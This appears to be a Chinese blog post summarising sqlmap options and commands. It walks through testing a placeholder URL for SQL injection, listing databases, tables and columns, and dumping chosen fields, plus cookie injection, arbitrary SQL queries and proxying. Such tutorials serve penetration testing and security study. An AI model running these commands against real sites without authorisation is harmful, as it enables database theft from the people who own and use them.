zoukankan      html  css  js  c++  java
  • sqlmap 使用方法

    sqlmap可以用来检测和利用sql注入点。

    Options(选项):
      -h, --help            显示基本帮助信息
      -hh                   显示高级帮助信息
      --version             显示版本号
      -v VERBOSE            详细级别:0-6(默认为1).设置输出信息的详细程度
                            0:只显示追踪栈 ,错误以及重要信息。1:还显示信息和警告。2:显示debug消息。3:显示注入payload。
                            4:显示HTTP请求。5:显示HTTP响应头。6:显示HTTP响应内容
    
    Target(目标):
      以下至少需要设置其中一个选项来提供给目标URL
      -d DIRECT			直接连接到数据库的连接字符串
      -u URL, --url=URL	目标URL (e.g. "http://www.site.com/vuln.php?id=1")
      -l LOGFILE		从Burp或WebScarab代理的日志中解析目标
      -x SITEMAPURL		从远程站点地图文件(.xml)解析目标(s)
      -m BULKFILE		扫描文本文件中给出的多个目标
      -r REQUESTFILE 	从文件加载HTTP请求
      -g GOOGLEDORK		处理Google dork的结果作为目标URL
      -C CONFIGILE		从INI配置文件中加载选项
    
    检查注入点 
    	sqlmap -u "http://ooxx.com/a.php?id=1" 
    列数据库信息 
    	sqlmap -u "http://ooxx.com/a.php?id=1" --dbs 
    指定数据库名列出所有表 
    	sqlmap -u "http://ooxx.com/a.php?id=1" -D dbsname --tables 
    指定数据库名表名列出所有字段 
    	sqlmap -u "http://ooxx.com/a.php?id=1" -D dbsname -T tablename --columns 
    指定数据库名表名字段dump出指定字段 
    	sqlmap -u "http://ooxx.com/a.php?id=1" -D dbsname -T tablename -C columnname --dump 
    cookie 注入  
    	--cookie=COOKIE         在需要登录的地方,需要登录后的cookie 
    执行指定的 SQL 语句 
    	--sql-query=QUERY 
    代理注入
    	--proxy="http://127.0.0.1:8087"
    

  • 相关阅读:
    450. K组翻转链表
    6. 合并排序数组 II
    64. 合并排序数组
    165. 合并两个排序链表
    103. 带环链表 II
    102. 带环链表
    [web安全原理]PHP命令执行漏洞基础
    [原题复现]-HITCON 2016 WEB《babytrick》[反序列化]
    《将博客搬至CSDN》
    PHP反序列化漏洞-CVE-2016-7124(绕过__wakeup)复现
  • 原文地址:https://www.cnblogs.com/augustine0654/p/15291567.html
Copyright © 2011-2022 走看看